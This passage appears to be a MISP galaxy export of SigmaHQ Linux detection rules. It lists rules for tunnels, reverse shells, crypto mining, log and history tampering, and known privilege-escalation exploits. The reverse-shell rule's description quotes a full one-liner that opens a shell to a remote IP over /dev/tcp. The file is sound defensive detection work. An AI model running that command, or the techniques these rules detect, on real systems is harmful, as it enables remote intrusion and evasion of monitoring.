"c4568f5d-131f-4e78-83d4-45b2da0ec4f1", "value": "Communication To LocaltoNet Tunneling Service Initiated - Linux" }, { "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data by malicious actors", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-03", "falsepositive": [ "Legitimate use of ngrok" ], "filename": "net_connection_lnx_ngrok_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://twitter.com/hakluke/status/1587733971814977537/photo/1", "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" ], "tags": [ "attack.exfiltration", "attack.command-and-control", "attack.t1567", "attack.t1568.002", "attack.t1572", "attack.t1090", 
"attack.t1102", "attack.s0508" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", "value": "Communication To Ngrok Tunneling Service - Linux" }, { "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-16", "falsepositive": [ "Unknown" ], "filename": "net_connection_lnx_back_connect_shell_dev.yml", "level": "critical", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", "value": "Linux Reverse Shell Indicator" }, { 
"description": "Detects process connections to a Monero crypto mining pool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Legitimate use of crypto miners" ], "filename": "net_connection_lnx_crypto_mining_indicators.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://www.poolwatch.io/coin/monero", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" ], "tags": [ "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", "value": "Linux Crypto Mining Pool Connections" }, { "description": "Detects programs that connect to known malware callback ports based on threat intelligence reports.\n", "meta": { "author": "hasselj", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "net_connection_lnx_susp_malware_callback_port.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html", "https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections", "https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team", "https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html", "https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_susp_malware_callback_port.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1571" ] }, "related": [ { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dbfc7c98-04ab-4ab7-aa94-c74d22aa7376", "value": "Potentially Suspicious Malware Callback Communication - Linux" }, { "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-04-02", "falsepositive": [ "Unknown" ], "filename": "lnx_shell_susp_rev_shells.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://alamot.github.io/reverse_shells/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", "value": "Suspicious Reverse Shell Command Line" }, { "description": "Detects suspicious command with /dev/tcp", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Unknown" ], "filename": "lnx_susp_dev_tcp.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", "https://book.hacktricks.xyz/shells/shells/linux", "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" ], "tags": [ "attack.reconnaissance" ] }, "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", "value": "Suspicious Use of /dev/tcp" }, { "description": "Detects the presence of \"bpf_probe_write_user\" BPF helper-generated warning messages. 
This could be a sign of suspicious eBPF activity on the system.", "meta": { "author": "Red Canary (idea), Nasreddine Bencherchali", "creation_date": "2023-01-25", "falsepositive": [ "Unknown" ], "filename": "lnx_potential_susp_ebpf_activity.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://redcanary.com/blog/ebpf-malware/", "https://man7.org/linux/man-pages/man7/bpf-helpers.7.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "0fadd880-6af3-4610-b1e5-008dc3a11b8a", "value": "Potential Suspicious BPF Activity - Linux" }, { "description": "Detects a suspicious command sequence used by JexBoss", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-08-24", "falsepositive": [ "Unknown" ], "filename": "lnx_susp_jexboss.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", "value": "JexBoss Command Sequence" }, { "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-04-05", "falsepositive": [ "Unknown" ], "filename": "lnx_symlink_etc_passwd.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.qualys.com/2021/05/04/21nails/21nails.txt", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" ], "tags": [ "attack.t1204.001", "attack.execution" ] }, "related": [ { "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", "value": "Symlink Etc Passwd" }, { "description": "Detects buffer overflow attempts in Unix system log files", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-01", "falsepositive": [ "Unknown" ], "filename": "lnx_buffer_overflows.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" ], "tags": [ "attack.t1068", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", "value": "Buffer Overflow Attempts" }, { "description": "Detects suspicious shell commands used in various exploit codes (see references)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-08-21", "falsepositive": [ "Unknown" ], "filename": "lnx_shell_susp_commands.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "http://pastebin.com/FtygZ1cg", "https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", "https://artkond.com/2017/03/23/pivoting-guide/", 
"https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", "value": "Suspicious Activity in Shell Commands" }, { "description": "Detects suspicious log entries in Linux log files", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-25", "falsepositive": [ "Unknown" ], "filename": "lnx_shell_susp_log_entries.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" ], "tags": [ "attack.impact" ] }, "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", "value": "Suspicious Log Entries" }, { "description": "Detects the addition of a new user to a privileged group such as \"root\" or \"sudo\"", "meta": { "author": "Pawel Mazur", "creation_date": "2022-12-21", "falsepositive": [ "Administrative activity" ], "filename": "lnx_privileged_user_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid", "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", "https://linux.die.net/man/8/useradd", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml" ], "tags": [ 
"attack.persistence", "attack.t1136.001", "attack.t1098" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ac15ec3-d24f-4246-aa2a-3077bb1cf90e", "value": "Privileged User Has Been Created" }, { "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-05-05", "falsepositive": [ "Rare temporary workaround for library misconfiguration" ], "filename": "lnx_ldso_preload_injection.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://man7.org/linux/man-pages/man8/ld.so.8.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1574.006" ] }, "related": [ { "dest-uuid": "633a100c-b2c9-41bf-9be5-905c1b16c825", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", "value": "Code Injection by ld.so Preload" }, { "description": "Detects specific commands commonly used to remove or empty the syslog", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-09-10", "falsepositive": [ "Log rotation" ], "filename": "lnx_clear_syslog.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" ], "tags": [ "attack.impact", 
"attack.t1565.001" ] }, "related": [ { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", "value": "Commands to Clear or Remove the Syslog - Builtin" }, { "description": "Detects shellshock expressions in log files", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-14", "falsepositive": [ "Unknown" ], "filename": "lnx_shellshock.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", "value": "Shellshock Expression" }, { "description": "Detects the use of tools that copy files from or to remote systems", "meta": { "author": "Ömer Günal", "creation_date": "2020-06-18", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_file_copy.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://attack.mitre.org/techniques/T1105/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" ], "tags": [ "attack.command-and-control", "attack.lateral-movement", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", "value": "Remote File Copy" }, { "description": "Detects commands that try to clear or tamper with the Linux 
command history.\nThis technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as \"bash_history\" or \"zsh_history\".\n", "meta": { "author": "Patrick Bareiss", "creation_date": "2019-03-24", "falsepositive": [ "Unknown" ], "filename": "lnx_shell_clear_cmd_history.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", "https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", "value": "Linux Command History Tampering" }, { "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-05-04", "falsepositive": [ "Unknown" ], "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Immersive-Labs-Sec/nimbuspwn", "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": 
"b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", "value": "Nimbuspwn Exploitation" }, { "description": "Detects space after filename", "meta": { "author": "Ömer Günal", "creation_date": "2020-06-17", "falsepositive": [ "Typos" ], "filename": "lnx_space_after_filename_.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://attack.mitre.org/techniques/T1064", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" ], "tags": [ "attack.execution" ] }, "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", "value": "Space After Filename" }, { "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-04-09", "falsepositive": [ "Unknown" ], "filename": "lnx_apt_equationgroup_lnx.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" ], "tags": [ "attack.execution", "attack.g0020", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", "value": "Equation Group Indicators" }, { "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-05", "falsepositive": [ "Unknown" ], "filename": "lnx_vsftpd_susp_error_messages.yml", "level": "medium", 
"logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/dagwieers/vsftpd/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", "value": "Suspicious VSFTPD Error Messages" }, { "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", "meta": { "author": "Sreeman", "creation_date": "2022-01-26", "falsepositive": [ "Unknown" ], "filename": "lnx_auth_pwnkit_local_privilege_escalation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://twitter.com/wdormann/status/1486161836961579020", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.001" ] }, "related": [ { "dest-uuid": "6831414d-bb70-42b7-8030-d4e06b2660c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", "value": "PwnKit Local Privilege Escalation" }, { "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-15", "falsepositive": [ "Unlikely" ], "filename": "lnx_sudo_cve_2019_14287_user.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.openwall.com/lists/oss-security/2019/10/14/1", "https://twitter.com/matthieugarin/status/1183970598210412546", "https://access.redhat.com/security/cve/cve-2019-14287", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1068", "attack.t1548.003", "cve.2019-14287" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1365fe3b-0f50-455d-b4da-266ce31c23b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" }, { "description": "Detects relevant ClamAV messages", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-01", "falsepositive": [ "Unknown" ], "filename": "lnx_clamav_relevant_message.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml" ], "tags": [ "attack.resource-development", "attack.t1588.001" ] }, "related": [ { "dest-uuid": "7807d3a4-a885-4639-a786-c1ed41484970", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", "value": "Relevant ClamAV Message" }, { "description": "Detects disabling security tools", "meta": { "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "creation_date": "2020-06-17", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_syslog_security_tools_disabling_syslog.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", "value": "Disabling Security Tools - Builtin" }, { "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-02-20", "falsepositive": [ "Unknown" ], "filename": "lnx_syslog_susp_named.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", "value": "Suspicious Named Error" }, { "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-08-24", "falsepositive": [ "Unknown" ], "filename": "lnx_sshd_ssh_cve_2018_15473.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Rhynorater/CVE-2018-15473-Exploit", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml" ], "tags": [ "attack.reconnaissance", "attack.t1589" ] }, "related": [ { "dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", "value": "SSHD Error Message CVE-2018-15473" }, { "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-06-30", "falsepositive": [ "Unknown" ], "filename": "lnx_sshd_susp_ssh.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", "value": "Suspicious OpenSSH Daemon Error" }, { "description": "Detects suspicious session with two users present", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "Unknown" ], "filename": "lnx_guacamole_susp_guacamole.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://research.checkpoint.com/2020/apache-guacamole-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml" ], "tags": [ 
"attack.credential-access", "attack.t1212" ] }, "related": [ { "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1edd77db-0669-4fef-9598-165bda82826d", "value": "Guacamole Two Users Sharing Session Anomaly" }, { "description": "Detects suspicious modification of crontab file.", "meta": { "author": "Pawel Mazur", "creation_date": "2022-04-16", "falsepositive": [ "Legitimate modification of crontab" ], "filename": "lnx_cron_crontab_file_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml" ], "tags": [ "attack.persistence", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", "value": "Modifying Crontab" } ], "version": 20241104 }
